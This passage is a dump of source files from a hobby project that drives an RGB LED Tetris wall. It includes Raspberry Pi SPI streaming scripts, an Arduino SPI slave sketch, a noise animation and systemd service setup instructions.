'/dev/ttyACM0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = 0.040 #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n\n#s = serial.Serial(USBPORT, 115200) #57600 dc115200 230400\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\n\n#spi = pi.spi_open(0, 
115200)\nspi = pi.spi_open(0, 750000, 0)\n\n\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\n#gp = pigpio.pi()\nSYNC_PIN = 18 # GPIO pin numbers\npi.set_mode(SYNC_PIN, pigpio.INPUT)\n\nimport PIL.Image\nref_img = PIL.Image.open('../mario.png').convert('HSV')\n#ref_img = PIL.Image.open('d.png').convert('RGB')\n\nfor j in range(NUM_LEDS_V):\n for i in range(NUM_LEDS_H):\n px = ref_img.getpixel((i, j))\n print(1 if sum(px) > 0 else 0, end='')\n print('')\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\ncnt = 0\nprint(\"Start sending\")\nwhile True:\n timestart_proc = datetime.datetime.now()\n\n for x in range(NUM_LEDS_H):\n for y in range(NUM_LEDS_V):\n #leds[x, y] = 12\n #leds[x, y] = (6*(cnt-x+y) % 64, 4*(cnt-x+y) % 64, 2*(cnt-x+y) % 64)\n px = ref_img.getpixel((x, y))\n leds[x, NUM_LEDS_V - y - 1] = px\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_dec = leds.transpose(1, 0, 2).flatten().tobytes()\n\n timestart_send = datetime.datetime.now()\n\n print(\"sending bytes:\", len(data_dec))\n pi.spi_write(spi, data_dec)\n \n timestart_render = datetime.datetime.now()\n\n wait = True\n\n while wait:\n v = (pi.read_bank_1() >> SYNC_PIN) & 1\n if v == 1:\n wait = False\n else:\n #print(cnt, \"wait for sync\", v)\n pass\n\n cnt += 1\n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart_proc).microseconds))\n \n time_proc = timestart_send - timestart_proc\n time_send = timestart_render - timestart_send\n time_render = timefin - timestart_render\n time_total = time_send + time_render + time_proc\n print(\"time_proc: {time_proc}, time_send: {time_send}, \"\n \"time_render: {time_render}, time_total: {time_total}, \"\n \"wait_t: {waittime}\".format(\n time_proc=time_proc.microseconds / 1000,\n time_send=time_send.microseconds / 1000,\n time_render=time_render.microseconds / 1000,\n time_total=time_total.microseconds 
/ 1000,\n waittime=waittime,\n ))\n\n time.sleep(waittime) \n\npi.spi_close(spi)\npi.stop()\n" }, { "alpha_fraction": 0.5221595764160156, "alphanum_fraction": 0.5487509965896606, "avg_line_length": 13.75, "blob_id": "cf9cf189f5ee9876b0209775b6da793fe258dd9e", "content_id": "231bf64dd1e1031f109f0e5ab9ef9e7f5643fdbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 53, "num_lines": 84, "path": "/arduino_controller/workbench/spi_test/spi_test.ino", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\n#include <SPI.h>\n\n#define BUFSZ 288\nchar buf [BUFSZ];\nvolatile byte pos;\nvolatile boolean processing;\nint cnt = 0;\nconst int SYNC_PIN = 47;\n\nvoid setup() {\n Serial.begin(115200);\n \n // turn on SPI in slave mode\n SPCR |= bit (SPE);\n\n // have to send on master in, *slave out*\n pinMode(MISO, OUTPUT);\n pinMode(SYNC_PIN, OUTPUT);\n\n // get ready for an interrupt \n pos = 0;\n processing = false;\n\n // now turn on interrupts\n SPI.attachInterrupt();\n \n // give time to set up:\n delay(100);\n}\n\nvolatile bool foo = false;\n\nISR (SPI_STC_vect)\n{\n byte c = SPDR; // grab byte from SPI Data Register\n\n if (processing) {\n return;\n }\n\n digitalWrite(SYNC_PIN, LOW);\n //digitalWrite(13, LOW);\n\n if (c == '\\n') {\n processing = true;\n return;\n }\n\n if (pos < BUFSZ) {\n buf[pos++] = c;\n }\n}\n\n\nvoid loop (void)\n{\n int i, c;\n \n if (processing) {\n /*\n if (!foo) {\n digitalWrite(13, HIGH);\n foo = !foo;\n } else {\n digitalWrite(13, LOW);\n foo = !foo;\n }\n */\n \n buf[pos] = 0;\n if (cnt == 0) {\n Serial.println(pos);\n }\n \n pos = 0;\n cnt = (cnt + 1) % 256;\n\n delay(12);\n digitalWrite(SYNC_PIN, HIGH);\n //digitalWrite(13, HIGH);\n\n processing = false;\n }\n}\n\n" }, { "alpha_fraction": 0.7969151735305786, "alphanum_fraction": 0.7969151735305786, "avg_line_length": 26.785715103149414, "blob_id": 
"18c8edfa211c8d5c067a88ba2918cd7415f8ed89", "content_id": "b1b5d50f2c94a8dfa842db9e2d994e2cc0296265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 389, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/operation/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "To install as service, copy the script to the systemd service directory\n\n\tsudo cp rgb-tetris-wall.service /etc/systemd/system\n\nEnable the service and use `service` as you would normally\n\n\tsudo systemctl enable rgb-tetris-wall\n\tsudo service rgb-tetris-wall start\n\nSome shortcuts:\n\n\tsudo service rgb-tetris-wall start\n\tsudo service rgb-tetris-wall stop\n\tsudo service rgb-tetris-wall restart\n" }, { "alpha_fraction": 0.6758620738983154, "alphanum_fraction": 0.6919540166854858, "avg_line_length": 20.75, "blob_id": "02f6e53f6b8aa6aa6894faa8aca44e4402dad6e5", "content_id": "f42ce4fb57fcab277d376b2fc7587f3e54ad686c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/reels/rauschen.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRauschen reel.\n\nJust some randomly changing gray values, to emulate random noise on a television.\n\nCreated by kratenko.\n\"\"\"\nimport numpy as np\nimport time\nfrom fluter import Fluter\n\nfluter = Fluter()\n\nwhile True:\n # great gray pixels\n f = np.random.randint(256, size=(fluter.height, fluter.width), dtype=np.uint8)\n # rescale to rgb\n f = np.stack((f,)*fluter.depth, axis=-1)\n fluter.send_array(f)\n time.sleep(.01)\n" }, { "alpha_fraction": 0.5030580759048462, "alphanum_fraction": 0.5259938836097717, "avg_line_length": 23.22222137451172, "blob_id": "715df2e757bfca2e17fd23a5853f8cdbae6eed52", "content_id": "67f38fe9f973baa7cf9ec4573d1eaa84c78649e7", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 62, "num_lines": 27, "path": "/raspi_preproc/workbench/streaming/lib/visualization.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from six import BytesIO\nimport base64 as b64\n\ndef send_visdom(vis, im, win=None, env=None, opts=None):\n opts = {} if opts is None else opts\n\n opts['height'] = opts.get('height', im.height)\n opts['width'] = opts.get('width', im.width)\n\n buf = BytesIO()\n im.save(buf, format='PNG')\n b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')\n\n data = [{\n 'content': {\n 'src': 'data:image/png;base64,' + b64encoded,\n 'caption': opts.get('caption'),\n },\n 'type': 'image',\n }]\n\n return vis._send({\n 'data': data,\n 'win': win,\n 'eid': env,\n 'opts': opts,\n })\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 38.5, "blob_id": "516471cca6c2213e370e21ab299c84bf1093ca2f", "content_id": "8c58e498e050e98fc5ef1ee3c5e2ff6be856d713", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 46, "num_lines": 2, "path": "/fluter.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# just wrap fluter module, so pycharm finds it\nfrom reels.fluter import Fluter" }, { "alpha_fraction": 0.48973608016967773, "alphanum_fraction": 0.53665691614151, "avg_line_length": 12.038461685180664, "blob_id": "456b6260e922f887e7dc9d50ddcef4ac4083aa8f", "content_id": "532406848f18e795d7252e359e829d3e0481135a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 27, "num_lines": 26, "path": "/raspi_preproc/workbench/s1.py", "repo_name": "deepestcyber/rgb-tetris-wall", 
"src_encoding": "UTF-8", "text": "import time\nimport pigpio\n\npi = pigpio.pi()\n\nif not pi.connected:\n print(\"nope\")\n exit(0)\n\nh = pi.spi_open(0, 1152000)\n\n\nn = 0\n\ntry:\n while True:\n n += 1\n s = \"n:%04x\\n\" % n\n pi.spi_xfer(h, s)\n print(s)\n #time.sleep(0.01)\nexcept KeyboardInterrupt:\n print(\"Byebye\")\n\npi.spi_close(h)\npi.stop()\n\n\n" } ]
36
joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning
https://github.com/joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning
3ecb2f795b63490b76c0427f3262af254dd118ea
5607c3d1f02efa285d04b933b9d1f601903e6535
ec56cadfe20834b9e6536ce075f0d807f509c967
refs/heads/master
2022-12-07T20:53:29.842211
2020-09-02T20:41:23
2020-09-02T20:41:23
284,818,782
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5160680413246155, "alphanum_fraction": 0.5268701314926147, "avg_line_length": 29.866666793823242, "blob_id": "9bd10bbeb9058a9c89c9c117330e7ce0a6a83e4f", "content_id": "2e44d1ec227dc5a7d829b754a0e52049b35d145f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3703, "license_type": "no_license", "max_line_length": 102, "num_lines": 120, "path": "/MLP/models/mlp_reg_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom mlp_layers import BasicDenseLayer\n\n#from utils import (get_flat_dim, get_convblock_dim, get_deconvblock_padding)\n\nfrom mlp_fpad import MLP_FPAD\n\n\nclass MLP_REG_FPAD(nn.Module):\n def __init__(self,\n num_materials,\n input_dims=275,\n dense_task=[128, 128, 2],\n dense_enc=[128, 128],\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_classifier=True):\n\n super(MLP_REG_FPAD, self).__init__()\n\n self.input_dims = input_dims\n self.dense_task = dense_task\n self.dense_enc = dense_enc\n self.dense_adv = [128, 128, num_materials]\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n self.is_classifier = is_classifier\n\n # Initialize encoder layers\n self.encoder = MLP_FPAD(input_dims=self.input_dims,\n dense_dims=self.dense_enc,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n is_classifier=False)\n\n # Initialize task-classifier layers\n self.task_classifier = MLP_FPAD(input_dims=self.dense_enc[-1],\n dense_dims=self.dense_task,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n 
is_classifier=True)\n\n # Initialize adv-classifier layers\n self.adv_classifier = MLP_FPAD(input_dims=self.dense_enc[-1],\n dense_dims=self.dense_adv,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n is_classifier=True)\n\n def forward(self, x_real, x_fake):\n # forward pass encoder\n h_enc_real = self.encoder(x_real)\n h_enc_fake = self.encoder(x_fake)\n\n h_enc = [torch.cat([h_real, h_fake], dim=0) for h_real, h_fake in zip(h_enc_real, h_enc_fake)]\n\n # forward pass task-classifier\n h_task = self.task_classifier(h_enc[-1])\n\n # forward pass adv-classifier\n h_adv = self.adv_classifier(h_enc_fake[-1])\n\n return h_enc, h_task, h_adv\n \n def predict(self, x_real, x_fake):\n \n # forward pass encoder\n h_enc_real = self.encoder(x_real)\n h_enc_fake = self.encoder(x_fake)\n\n h_enc = [torch.cat([h_real, h_fake], dim=0) for h_real, h_fake in zip(h_enc_real, h_enc_fake)]\n\n # forward pass task-classifier\n h_task = self.task_classifier(h_enc[-1])\n \n probs = F.softmax(h_task[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n\n import os\n os.getcwd()\n os.chdir(\"./\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. 
\n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n num_materials = 3\n \n model = MLP_REG_FPAD(num_materials).to(DEVICE)\n\n print(model)" }, { "alpha_fraction": 0.7014778256416321, "alphanum_fraction": 0.7172414064407349, "avg_line_length": 26.45945930480957, "blob_id": "13dfbba06c458f3448dfcbc0d3f47255d4638508", "content_id": "06a0b39ac94da78307890918d8099cb606f414d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1015, "license_type": "no_license", "max_line_length": 48, "num_lines": 37, "path": "/II-GAN/utils/utils.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\ndef normal_weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.2)\n elif classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.2)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 0, 0.2)\n nn.init.constant_(m.bias.data, 0)\n\ndef _nanargmin(arr):\n try:\n return np.nanargmin(arr)\n except ValueError:\n return np.nan" }, { "alpha_fraction": 0.48242104053497314, "alphanum_fraction": 0.5141738057136536, "avg_line_length": 32.375, "blob_id": "91414bf54c37b403b7e5b0876ebe81d619282d55", "content_id": 
"b95e852b75af1d61f4e6a4752524b16038443e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11747, "license_type": "no_license", "max_line_length": 147, "num_lines": 352, "path": "/VGG/data/data_vgg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nimport math\nfrom PIL import Image\nfrom PIL import ImageOps\nimport cv2\nimport matplotlib.pyplot as plt\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \nBATCH_SIZE = 8\nMIN_WIDTH = -1\nMIN_HEIGHT = -1\n\nMIN_CROP_WIDTH = -1\nMIN_CROP_HEIGHT = -1\n\ndef get_data_loaders(path, dataset, test_material, croped=True, unseen_attack=False):\n \n global MIN_WIDTH \n global MIN_HEIGHT \n global MIN_CROP_WIDTH \n global MIN_CROP_HEIGHT \n global BATCH_SIZE\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n MIN_WIDTH = 141\n MIN_HEIGHT = 205\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n MIN_WIDTH = 109\n MIN_HEIGHT = 157\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test 
= np.array(range(750, 997))\n MIN_WIDTH = 101\n MIN_HEIGHT = 149\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n elif dataset == \"Hi_Scan\":\n BATCH_SIZE = 16\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n MIN_WIDTH = 163\n MIN_HEIGHT = 251\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n MIN_WIDTH = 55\n MIN_HEIGHT = 49\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=1500, size=500)\n MIN_WIDTH = 141\n MIN_HEIGHT = 205\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n MIN_WIDTH = 109\n MIN_HEIGHT = 157\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=997, size=250)\n MIN_WIDTH = 101\n MIN_HEIGHT = 149\n 
MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n elif dataset == \"Hi_Scan\":\n BATCH_SIZE = 16\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n MIN_WIDTH = 163\n MIN_HEIGHT = 251\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=4440, size=1480)\n MIN_WIDTH = 55\n MIN_HEIGHT = 49\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n\n \nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n material_idx,\n 
real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([1]*len(fake_names))\n \n f.extend([index]*len(fake_names))\n f_norm.extend([index]*len(fake_names))\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = real_names[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(real_names)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx 
= idx.tolist()\n \n img_name = self.X[idx]\n\n \n sample = Image.open(img_name.rstrip())\n width, height = sample.size\n \n sample = np.array(sample)/255.0\n \n if self.croped == True: \n \n \n sample = Image.fromarray(np.uint8(sample))\n width, height = sample.size\n \n \n left = int((width-MIN_CROP_WIDTH)/2)\n right = width - MIN_CROP_WIDTH - left\n top = int((height-MIN_CROP_HEIGHT)/2)\n bottom = height - MIN_CROP_HEIGHT - top\n \n sample = ImageOps.crop(sample, (left, top, right, bottom)) \n \n transformation = self.transformations()\n \n width, height = sample.size\n \n #Resize\n if width < height:\n ratio = 224/width\n else:\n ratio = 224/height\n \n ratio = math.ceil(ratio)\n \n #sample = sample.resize((width*ratio, height*ratio)) #AO FAZER ISTO NOS CROP SUBSTITUIR NEW_WIDTH POR MIN_WIDTH E NEW_HEIGHT POR MIN_HEIGHT\n \n sample = np.array(sample)\n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n \n sample.reshape((1, sample.shape[0], sample.shape[1]))\n \n sample = cv2.merge((sample, sample, sample))\n \n return transformation(sample).view((3, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n return data_transform\n \n#%%\n \nif __name__ == '__main__':\n\n \n train, val, test = get_data_loaders(\"L:/FPAD/Dataset/LivDet2015/train/\", \"GreenBit\", 0, croped=True, unseen_attack=True)\n\n for i, (x, y, f, _) in enumerate(train):\n print(x.shape)\n print(y.shape)\n print(f.shape)\n \n x = x[f==-1]\n \n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n ax1.axis(\"off\")\n ax1.imshow(x[0,0,...], 'gray')\n ax2.axis(\"off\")\n ax2.imshow(x[1,0,...], 'gray')\n ax3.axis(\"off\")\n ax3.imshow(x[2,0,...], 'gray')\n ax4.axis(\"off\")\n ax4.imshow(x[3,0,...], 'gray')\n fig.show()\n break" }, { "alpha_fraction": 
0.4916198253631592, "alphanum_fraction": 0.5105881094932556, "avg_line_length": 40.69037628173828, "blob_id": "257c8ef507f544e264ada31b8d4cff2ca58d95f1", "content_id": "a5c15ed8817fba6ce65a3f92ea3b762e0b90bfaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19928, "license_type": "no_license", "max_line_length": 461, "num_lines": 478, "path": "/VGG/run_vgg_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport pickle\nimport math\nimport sys\nimport torchvision.models as models\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\n\nfrom vgg_utils import _nanargmin, set_parameter_requires_grad\nfrom data_vgg import get_data_loaders\n\n#%% \n\nEPOCHS = 50\n\nloss_fn = F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\ndef fit(model, data, device, model_path, output):\n # train and validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n\n # Set the optimizer\n optimizer = torch.optim.Adam(model.parameters(),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation 
params\n best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n print('\\nEPOCH {}/{}\\n'.format(epoch + 1, EPOCHS))\n\n # TRAINING\n # set model to train\n model.train()\n for i, (x, y, f, _) in enumerate(train_loader): # iterations loop\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n\n # print('y')\n # print(y)\n # print('f')\n # print(f)\n\n # forward pass\n y_pred = model(x)\n\n # Compute vae loss\n loss = loss_fn(y_pred, y)\n\n # Backprop and optimize\n optimizer.zero_grad() # clear previous gradients\n loss.backward() # compute new gradients\n optimizer.step() # optimize the parameters\n\n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}-th mini-batch loss: {:.3f}'.format(i, loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, device)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, device)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n 
